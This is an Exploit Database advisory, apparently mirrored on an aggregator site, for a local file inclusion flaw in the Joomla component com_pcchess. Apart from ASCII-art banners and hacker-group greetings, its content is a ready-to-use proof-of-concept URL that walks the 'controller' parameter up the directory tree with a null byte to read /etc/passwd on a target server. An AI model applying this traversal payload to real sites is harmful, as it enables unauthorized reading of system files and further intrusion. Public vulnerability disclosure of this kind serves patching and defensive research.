Joomla! Component com_pcchess – Local File Inclusion

• Exploit Database
• 9 阅读

• 作者： team_elite
  日期： 2010-04-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12123/

• ================================================================================================
  ================================================================================================
  == @@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@ ==
  == @@@@@@@@@@@@@@@@@@@@@@@@ @@@	 @@@@@@@@@@@@@@@@@@@@@@@@ ==
  ==@@ @@@@ @@@@ @ @ @@@@@@@@ @@ @@ ==
  ==@@ @@@@ @@@@@ @@@@@@@@@ @@ @@ ==
  ==@@ @@@@@@@@@@@@@@@ @ @@@@@@@@@@@@ @@ @@@@@@ ==
  ==@@ @@@@ @@@@ @@@@@@@@ @@ @@ ==
  ==@@ @@@@ @@@@ @@@@@@@@ @@ @@ ==
  ==@@ @@@@@@@@ @@@@ @@@@@@@@@@@@@@@@ @@ @@@@@@ ==
  ==@@ @@@@@@@@ @@@@ @@ @@@@@@@@@@ @@@@@@@@@@@@@@ @@ @@@@@@ ==
  ==											==
  ================================================================================================
  ================================================================================================
  		 ||||||
  		 |||					|||
  [[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
  [[								 	[[
  [[ joomla Component com_pcchess Local File Inclusion Vulnerability 						[[
  [[															[[
  [[ ** Bugs Found by team_elite | http://manadocoding.net | http://www.gcc.web.id/ |				 	[[
  [[															[[
  [[ ## Exploit: index.php?option=com_pcchess&controller=[LFI]%00							[[
  [[															[[
  [[ ## PoC: 													[[
  [[															[[
  [[- http://[target]/[path]/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00 [[
  [[															[[
  [[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
  		 |||					|||
  		 |||					|||
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  ~~~~Greetz and Thanks to: All member gcc, all member manadocoding ~~~~
  ~~~~									~~~~
  ~~~~MC team : team_elite , devilbat , zreg				~~~~
  ~~~~thanks for : cr4wl3r						~~~~
  ~~~~									~~~~
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  * -,
  * -@@ 
  * -@@#
  * -:@@; 
  * - @@@@@......`
  * -@@@@.@@@@@@@@@@@#
  * - @@@@@@@@@@@@@@@@@@` 
  * - @@@@@@@@@@@@@@@@@@@@; 
  * -#@@@@@@@@@@@@@@@@@ 
  * -`@@,@@@@@@@@@@@@@@@@@: 
  * - @@@+@@@@@@@ @@@@@@@;@@@`
  * - :@@@@@@@@@:@,; @@@@@@@ .@@
  * -@@@@@@@@@@@:@@@@@@@@@@ 
  * - @@@@' ` ` @@@@@@@@@:+.
  * - .@@@@@@@@@@@@@ .
  * - , +@@@@@@@@@@@@@
  * -+@@@@@@@@@@@@@@@@@@@@# 
  * - ,@@@@@@@@@@@@@@@@@ +@@@ 
  * -`@@@@@@@@@@@@@@@@@@@ @@@ 
  * - @@@@@@@@@@@@@@@@@@@ @@` 
  * -@@@@@@@@@@@@@@@@@@ @@
  * - +@@@@@@@@@@; @@@# @ 
  * - @@@@@@@@@ : 
  * - @@@@@@@@ ,@@
  * -@@@@@@@@@ @@@' 
  * -@@@@@@@`@ @@@; 
  * -@@@@@@@@ @.@@@@@@@@
  * -@@@@@@@@@@@@@@@@@@@@@@#
  * - @@@@@@@@@@@@@@@@@@@@@@@@@@@ 
  * - @ @@@@@@@ ;@@@@@@@@@@@@@@@@@
  * - @ @@@@@@@@@@@@@@@@@@@,@@@@+ 
  * - @@@@@@@@@@@@@@@@@@@@@@@ 
  * - @@@ @@@@@@@@@@@@@@@; @@@@ 
  * - @@@@@@@@@`@@@. @@.
  * - @@; @@@@#:@@@@@# @@.
  * - @ @@@: ;@ 
  * -;` @@ ;@ 
  * -@@@
  * - @#
  * - : : 
  * --------------------------------------------->>>> bugs found on 08 April 2010 by team_elite.